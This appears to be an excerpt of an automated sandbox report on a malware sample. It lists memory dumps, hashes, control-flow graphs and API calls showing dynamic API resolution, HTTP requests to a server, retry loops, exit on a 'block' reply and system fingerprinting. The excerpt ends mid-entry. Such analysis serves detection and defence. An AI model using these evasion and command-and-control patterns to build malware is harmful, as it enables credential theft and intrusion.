                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 34cdfdabf0c7dcee574f1caa664e21955b0caaf890707170f5c0a7f6ddfbcf5b
                              • Instruction ID: 8777108bf18998cff1506824b63f2da5208ee2aa5b0c4dfaf08d25661a57b6d6
                              • Opcode Fuzzy Hash: 34cdfdabf0c7dcee574f1caa664e21955b0caaf890707170f5c0a7f6ddfbcf5b
                              • Instruction Fuzzy Hash: 88F044B1944648ABC700DFD4DD85BAEBBB8F704711F100159FA15E2780C77425058BA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: e5ab345262ca03596d2bbea1648f87e2889ad7293aab8fb259e1c195792ad39d
                              • Instruction ID: dd54886ad99ddc8d94883d237b21920f8e8ff908039e7fbfe7241bbb1b9e7c0f
                              • Opcode Fuzzy Hash: e5ab345262ca03596d2bbea1648f87e2889ad7293aab8fb259e1c195792ad39d
                              • Instruction Fuzzy Hash: 5CD05E7490030CDBCB00DFE0D8896DDBB78FB08312F001554E905A2340EA306482CBA6

                              Control-flow Graph

                              control_flow_graph 633 8b9c10-8b9c1a 634 8b9c20-8ba031 GetProcAddress * 43 633->634 635 8ba036-8ba0ca LoadLibraryA * 8 633->635 634->635 636 8ba0cc-8ba141 GetProcAddress * 5 635->636 637 8ba146-8ba14d 635->637 636->637 638 8ba153-8ba211 GetProcAddress * 8 637->638 639 8ba216-8ba21d 637->639 638->639 640 8ba298-8ba29f 639->640 641 8ba21f-8ba293 GetProcAddress * 5 639->641 642 8ba337-8ba33e 640->642 643 8ba2a5-8ba332 GetProcAddress * 6 640->643 641->640 644 8ba41f-8ba426 642->644 645 8ba344-8ba41a GetProcAddress * 9 642->645 643->642 646 8ba428-8ba49d GetProcAddress * 5 644->646 647 8ba4a2-8ba4a9 644->647 645->644 646->647 648 8ba4ab-8ba4d7 GetProcAddress * 2 647->648 649 8ba4dc-8ba4e3 647->649 648->649 650 8ba515-8ba51c 649->650 651 8ba4e5-8ba510 GetProcAddress * 2 649->651 652 8ba612-8ba619 650->652 653 8ba522-8ba60d GetProcAddress * 10 650->653 651->650 654 8ba61b-8ba678 GetProcAddress * 4 652->654 655 8ba67d-8ba684 652->655 653->652 654->655 656 8ba69e-8ba6a5 655->656 657 8ba686-8ba699 GetProcAddress 655->657 658 8ba708-8ba709 656->658 659 8ba6a7-8ba703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(75900000,01415DE8), ref: 008B9C2D
                              • GetProcAddress.KERNEL32(75900000,01415CC8), ref: 008B9C45
                              • GetProcAddress.KERNEL32(75900000,01428E20), ref: 008B9C5E
                              • GetProcAddress.KERNEL32(75900000,01428DC0), ref: 008B9C76
                              • GetProcAddress.KERNEL32(75900000,0142C9F8), ref: 008B9C8E
                              • GetProcAddress.KERNEL32(75900000,0142CB60), ref: 008B9CA7
                              • GetProcAddress.KERNEL32(75900000,0141AD80), ref: 008B9CBF
                              • GetProcAddress.KERNEL32(75900000,0142C9E0), ref: 008B9CD7
                              • GetProcAddress.KERNEL32(75900000,0142CB30), ref: 008B9CF0
                              • GetProcAddress.KERNEL32(75900000,0142C968), ref: 008B9D08
                              • GetProcAddress.KERNEL32(75900000,0142CAB8), ref: 008B9D20
                              • GetProcAddress.KERNEL32(75900000,01415C08), ref: 008B9D39
                              • GetProcAddress.KERNEL32(75900000,01415BC8), ref: 008B9D51
                              • GetProcAddress.KERNEL32(75900000,01415B68), ref: 008B9D69
                              • GetProcAddress.KERNEL32(75900000,01415CA8), ref: 008B9D82
                              • GetProcAddress.KERNEL32(75900000,0142CB78), ref: 008B9D9A
                              • GetProcAddress.KERNEL32(75900000,0142CC38), ref: 008B9DB2
                              • GetProcAddress.KERNEL32(75900000,0141B118), ref: 008B9DCB
                              • GetProcAddress.KERNEL32(75900000,01415DA8), ref: 008B9DE3
                              • GetProcAddress.KERNEL32(75900000,0142CB48), ref: 008B9DFB
                              • GetProcAddress.KERNEL32(75900000,0142CAA0), ref: 008B9E14
                              • GetProcAddress.KERNEL32(75900000,0142CBA8), ref: 008B9E2C
                              • GetProcAddress.KERNEL32(75900000,0142CBC0), ref: 008B9E44
                              • GetProcAddress.KERNEL32(75900000,01415C28), ref: 008B9E5D
                              • GetProcAddress.KERNEL32(75900000,0142CC50), ref: 008B9E75
                              • GetProcAddress.KERNEL32(75900000,0142CB00), ref: 008B9E8D
                              • GetProcAddress.KERNEL32(75900000,0142CA88), ref: 008B9EA6
                              • GetProcAddress.KERNEL32(75900000,0142CA70), ref: 008B9EBE
                              • GetProcAddress.KERNEL32(75900000,0142CAE8), ref: 008B9ED6
                              • GetProcAddress.KERNEL32(75900000,0142CBF0), ref: 008B9EEF
                              • GetProcAddress.KERNEL32(75900000,0142CA28), ref: 008B9F07
                              • GetProcAddress.KERNEL32(75900000,0142CB90), ref: 008B9F1F
                              • GetProcAddress.KERNEL32(75900000,0142CC20), ref: 008B9F38
                              • GetProcAddress.KERNEL32(75900000,01429DD8), ref: 008B9F50
                              • GetProcAddress.KERNEL32(75900000,0142C980), ref: 008B9F68
                              • GetProcAddress.KERNEL32(75900000,0142C998), ref: 008B9F81
                              • GetProcAddress.KERNEL32(75900000,01415D68), ref: 008B9F99
                              • GetProcAddress.KERNEL32(75900000,0142CA10), ref: 008B9FB1
                              • GetProcAddress.KERNEL32(75900000,01415DC8), ref: 008B9FCA
                              • GetProcAddress.KERNEL32(75900000,0142C9B0), ref: 008B9FE2
                              • GetProcAddress.KERNEL32(75900000,0142CA40), ref: 008B9FFA
                              • GetProcAddress.KERNEL32(75900000,014157C8), ref: 008BA013
                              • GetProcAddress.KERNEL32(75900000,01415A68), ref: 008BA02B
                              • LoadLibraryA.KERNEL32(0142CB18,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA03D
                              • LoadLibraryA.KERNEL32(0142CA58,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA04E
                              • LoadLibraryA.KERNEL32(0142C9C8,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA060
                              • LoadLibraryA.KERNEL32(0142CAD0,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA072
                              • LoadLibraryA.KERNEL32(0142CBD8,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA083
                              • LoadLibraryA.KERNEL32(0142CC08,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA095
                              • LoadLibraryA.KERNEL32(0142CCE0,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA0A7
                              • LoadLibraryA.KERNEL32(0142CE00,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA0B8
                              • GetProcAddress.KERNEL32(75FD0000,014156C8), ref: 008BA0DA
                              • GetProcAddress.KERNEL32(75FD0000,0142CD40), ref: 008BA0F2
                              • GetProcAddress.KERNEL32(75FD0000,01428700), ref: 008BA10A
                              • GetProcAddress.KERNEL32(75FD0000,0142CC80), ref: 008BA123
                              • GetProcAddress.KERNEL32(75FD0000,01415888), ref: 008BA13B
                              • GetProcAddress.KERNEL32(734B0000,0141ADA8), ref: 008BA160
                              • GetProcAddress.KERNEL32(734B0000,01415788), ref: 008BA179
                              • GetProcAddress.KERNEL32(734B0000,0141AE20), ref: 008BA191
                              • GetProcAddress.KERNEL32(734B0000,0142CCF8), ref: 008BA1A9
                              • GetProcAddress.KERNEL32(734B0000,0142CDB8), ref: 008BA1C2
                              • GetProcAddress.KERNEL32(734B0000,014159A8), ref: 008BA1DA
                              • GetProcAddress.KERNEL32(734B0000,01415908), ref: 008BA1F2
                              • GetProcAddress.KERNEL32(734B0000,0142CDD0), ref: 008BA20B
                              • GetProcAddress.KERNEL32(763B0000,01415868), ref: 008BA22C
                              • GetProcAddress.KERNEL32(763B0000,014157E8), ref: 008BA244
                              • GetProcAddress.KERNEL32(763B0000,0142CD70), ref: 008BA25D
                              • GetProcAddress.KERNEL32(763B0000,0142CE18), ref: 008BA275
                              • GetProcAddress.KERNEL32(763B0000,01415A48), ref: 008BA28D
                              • GetProcAddress.KERNEL32(750F0000,0141B0C8), ref: 008BA2B3
                              • GetProcAddress.KERNEL32(750F0000,0141AE48), ref: 008BA2CB
                              • GetProcAddress.KERNEL32(750F0000,0142CD88), ref: 008BA2E3
                              • GetProcAddress.KERNEL32(750F0000,014156E8), ref: 008BA2FC
                              • GetProcAddress.KERNEL32(750F0000,01415808), ref: 008BA314
                              • GetProcAddress.KERNEL32(750F0000,0141B0F0), ref: 008BA32C
                              • GetProcAddress.KERNEL32(75A50000,0142CCC8), ref: 008BA352
                              • GetProcAddress.KERNEL32(75A50000,01415708), ref: 008BA36A
                              • GetProcAddress.KERNEL32(75A50000,01428820), ref: 008BA382
                              • GetProcAddress.KERNEL32(75A50000,0142CC98), ref: 008BA39B
                              • GetProcAddress.KERNEL32(75A50000,0142CDA0), ref: 008BA3B3
                              • GetProcAddress.KERNEL32(75A50000,01415A88), ref: 008BA3CB
                              • GetProcAddress.KERNEL32(75A50000,01415728), ref: 008BA3E4
                              • GetProcAddress.KERNEL32(75A50000,0142CD58), ref: 008BA3FC
                              • GetProcAddress.KERNEL32(75A50000,0142CDE8), ref: 008BA414
                              • GetProcAddress.KERNEL32(75070000,014158A8), ref: 008BA436
                              • GetProcAddress.KERNEL32(75070000,0142CC68), ref: 008BA44E
                              • GetProcAddress.KERNEL32(75070000,0142CD10), ref: 008BA466
                              • GetProcAddress.KERNEL32(75070000,0142CCB0), ref: 008BA47F
                              • GetProcAddress.KERNEL32(75070000,0142CD28), ref: 008BA497
                              • GetProcAddress.KERNEL32(74E50000,01415848), ref: 008BA4B8
                              • GetProcAddress.KERNEL32(74E50000,01415AA8), ref: 008BA4D1
                              • GetProcAddress.KERNEL32(75320000,01415968), ref: 008BA4F2
                              • GetProcAddress.KERNEL32(75320000,0142C908), ref: 008BA50A
                              • GetProcAddress.KERNEL32(6F060000,01415748), ref: 008BA530
                              • GetProcAddress.KERNEL32(6F060000,014159C8), ref: 008BA548
                              • GetProcAddress.KERNEL32(6F060000,014157A8), ref: 008BA560
                              • GetProcAddress.KERNEL32(6F060000,0142C950), ref: 008BA579
                              • GetProcAddress.KERNEL32(6F060000,01415768), ref: 008BA591
                              • GetProcAddress.KERNEL32(6F060000,01415828), ref: 008BA5A9
                              • GetProcAddress.KERNEL32(6F060000,014159E8), ref: 008BA5C2
                              • GetProcAddress.KERNEL32(6F060000,014158C8), ref: 008BA5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 008BA5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 008BA607
                              • GetProcAddress.KERNEL32(74E00000,0142C710), ref: 008BA629
                              • GetProcAddress.KERNEL32(74E00000,01428710), ref: 008BA641
                              • GetProcAddress.KERNEL32(74E00000,0142C890), ref: 008BA659
                              • GetProcAddress.KERNEL32(74E00000,0142C7D0), ref: 008BA672
                              • GetProcAddress.KERNEL32(74DF0000,014158E8), ref: 008BA693
                              • GetProcAddress.KERNEL32(6FA90000,0142C728), ref: 008BA6B4
                              • GetProcAddress.KERNEL32(6FA90000,01415A08), ref: 008BA6CD
                              • GetProcAddress.KERNEL32(6FA90000,0142C920), ref: 008BA6E5
                              • GetProcAddress.KERNEL32(6FA90000,0142C7E8), ref: 008BA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 57bf4608da8d93605e2bbcc5b21d75af4a6af3517653e243379657c082bc42e0
                              • Instruction ID: b047b59bb93cd809c30fab4b5c091d8d34b3240aade3b9ba668fb009df45a374
                              • Opcode Fuzzy Hash: 57bf4608da8d93605e2bbcc5b21d75af4a6af3517653e243379657c082bc42e0
                              • Instruction Fuzzy Hash: E5621EBA500280AFC354DFE8EDD89563BF9F76C301715851EA609CB264D639B883DF62

                              Control-flow Graph

                              control_flow_graph 1033 8a6280-8a630b call 8ba7a0 call 8a47b0 call 8ba740 InternetOpenA StrCmpCA 1040 8a630d 1033->1040 1041 8a6314-8a6318 1033->1041 1040->1041 1042 8a6509-8a6525 call 8ba7a0 call 8ba800 * 2 1041->1042 1043 8a631e-8a6342 InternetConnectA 1041->1043 1062 8a6528-8a652d 1042->1062 1045 8a6348-8a634c 1043->1045 1046 8a64ff-8a6503 InternetCloseHandle 1043->1046 1048 8a635a 1045->1048 1049 8a634e-8a6358 1045->1049 1046->1042 1051 8a6364-8a6392 HttpOpenRequestA 1048->1051 1049->1051 1052 8a6398-8a639c 1051->1052 1053 8a64f5-8a64f9 InternetCloseHandle 1051->1053 1055 8a639e-8a63bf InternetSetOptionA 1052->1055 1056 8a63c5-8a6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 8a642c-8a644b call 8b8940 1056->1058 1059 8a6407-8a6427 call 8ba740 call 8ba800 * 2 1056->1059 1067 8a64c9-8a64e9 call 8ba740 call 8ba800 * 2 1058->1067 1068 8a644d-8a6454 1058->1068 1059->1062 1067->1062 1071 8a6456-8a6480 InternetReadFile 1068->1071 1072 8a64c7-8a64ef InternetCloseHandle 1068->1072 1076 8a648b 1071->1076 1077 8a6482-8a6489 1071->1077 1072->1053 1076->1072 1077->1076 1078 8a648d-8a64c5 call 8ba9b0 call 8ba8a0 call 8ba800 1077->1078 1078->1071
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                                • Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • InternetOpenA.WININET(008C0DFE,00000001,00000000,00000000,00000000), ref: 008A62E1
                              • StrCmpCA.SHLWAPI(?,0142F028), ref: 008A6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008A63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008A63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008A63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008A646D
                              • InternetCloseHandle.WININET(00000000), ref: 008A64EF
                              • InternetCloseHandle.WININET(00000000), ref: 008A64F9
                              • InternetCloseHandle.WININET(00000000), ref: 008A6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: ae6bb9928502593783f9b1def8d51f1fc93205326b928f50ec5554f9e29ebe3b
                              • Instruction ID: a4b8680b129c93f3650c1ea45a0076ab20f1f1ffdf414a0a928a6a57f8b1d929
                              • Opcode Fuzzy Hash: ae6bb9928502593783f9b1def8d51f1fc93205326b928f50ec5554f9e29ebe3b
                              • Instruction Fuzzy Hash: A5713071A00218ABEF24DBE4CC95FEE7774FB45700F108158F509AB694DBB46A85CF52

                              Control-flow Graph

                              control_flow_graph 1090 8b5510-8b5577 call 8b5ad0 call 8ba820 * 3 call 8ba740 * 4 1106 8b557c-8b5583 1090->1106 1107 8b55d7-8b564c call 8ba740 * 2 call 8a1590 call 8b52c0 call 8ba8a0 call 8ba800 call 8baad0 StrCmpCA 1106->1107 1108 8b5585-8b55b6 call 8ba820 call 8ba7a0 call 8a1590 call 8b51f0 1106->1108 1134 8b5693-8b56a9 call 8baad0 StrCmpCA 1107->1134 1137 8b564e-8b568e call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1107->1137 1124 8b55bb-8b55d2 call 8ba8a0 call 8ba800 1108->1124 1124->1134 1139 8b56af-8b56b6 1134->1139 1140 8b57dc-8b5844 call 8ba8a0 call 8ba820 * 2 call 8a1670 call 8ba800 * 4 call 8b6560 call 8a1550 1134->1140 1137->1134 1142 8b57da-8b585f call 8baad0 StrCmpCA 1139->1142 1143 8b56bc-8b56c3 1139->1143 1271 8b5ac3-8b5ac6 1140->1271 1161 8b5991-8b59f9 call 8ba8a0 call 8ba820 * 2 call 8a1670 call 8ba800 * 4 call 8b6560 call 8a1550 1142->1161 1162 8b5865-8b586c 1142->1162 1146 8b571e-8b5793 call 8ba740 * 2 call 8a1590 call 8b52c0 call 8ba8a0 call 8ba800 call 8baad0 StrCmpCA 1143->1146 1147 8b56c5-8b5719 call 8ba820 call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1143->1147 1146->1142 1250 8b5795-8b57d5 call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1146->1250 1147->1142 1161->1271 1167 8b598f-8b5a14 call 8baad0 StrCmpCA 1162->1167 1168 8b5872-8b5879 1162->1168 1197 8b5a28-8b5a91 call 8ba8a0 call 8ba820 * 2 call 8a1670 call 8ba800 * 4 call 8b6560 call 8a1550 1167->1197 1198 8b5a16-8b5a21 Sleep 1167->1198 1175 8b587b-8b58ce call 8ba820 call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1168->1175 1176 8b58d3-8b5948 call 8ba740 * 2 call 8a1590 call 8b52c0 call 8ba8a0 call 8ba800 call 8baad0 StrCmpCA 1168->1176 1175->1167 1176->1167 1276 8b594a-8b598a call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1176->1276 1197->1271 1198->1106 1250->1142 1276->1167
                              APIs
                                • Part of subcall function 008BA820: lstrlen.KERNEL32(008A4F05,?,?,008A4F05,008C0DDE), ref: 008BA82B
                                • Part of subcall function 008BA820: lstrcpy.KERNEL32(008C0DDE,00000000), ref: 008BA885
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5857
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008B51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5228
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5318
                                • Part of subcall function 008B52C0: lstrlen.KERNEL32(00000000), ref: 008B532F
                                • Part of subcall function 008B52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 008B5364
                                • Part of subcall function 008B52C0: lstrlen.KERNEL32(00000000), ref: 008B5383
                                • Part of subcall function 008B52C0: lstrlen.KERNEL32(00000000), ref: 008B53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 008B5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 92b12320cc6435a60573887e74b9108a62fa95a75e633460e1983815a2edb3b7
                              • Instruction ID: 7147cdb2dd3bf1e165b5ea38c08904ec23eeb0854f25ed2092bef37a5877aa11
                              • Opcode Fuzzy Hash: 92b12320cc6435a60573887e74b9108a62fa95a75e633460e1983815a2edb3b7
                              • Instruction Fuzzy Hash: D8E11671910504AADB18FBA8DC96EED7778FF54300F508528B506E6691EF346B09CBA3

                              Control-flow Graph

                              Control-flow graph of the function starting at 008B17A0 (graph rendering not recoverable from the page; the API calls it makes are listed below)
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 008B17C5
                              • ExitProcess.KERNEL32 ref: 008B17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: a3cd3b5b12fcf5a66055603154e6228c8fda2e4bda910b78dce0376374b3e096
                              • Instruction ID: 1314b82fbd4ddff3723e26d966009919ab6432b3cca691a61924f28179c756f3
                              • Opcode Fuzzy Hash: a3cd3b5b12fcf5a66055603154e6228c8fda2e4bda910b78dce0376374b3e096
                              • Instruction Fuzzy Hash: C15148B4A00249EBCF04DFA4D9A8AFE7BB5FB44744F908058E516EB340D774E942CB62

                              Control-flow Graph

                              Control-flow graph of the function starting at 008B7500 (graph rendering not recoverable from the page; the API calls it makes are listed below)
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008B7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008B757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B760A
                              • wsprintfA.USER32 ref: 008B7640
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              Strings
                              Memory Dump Source
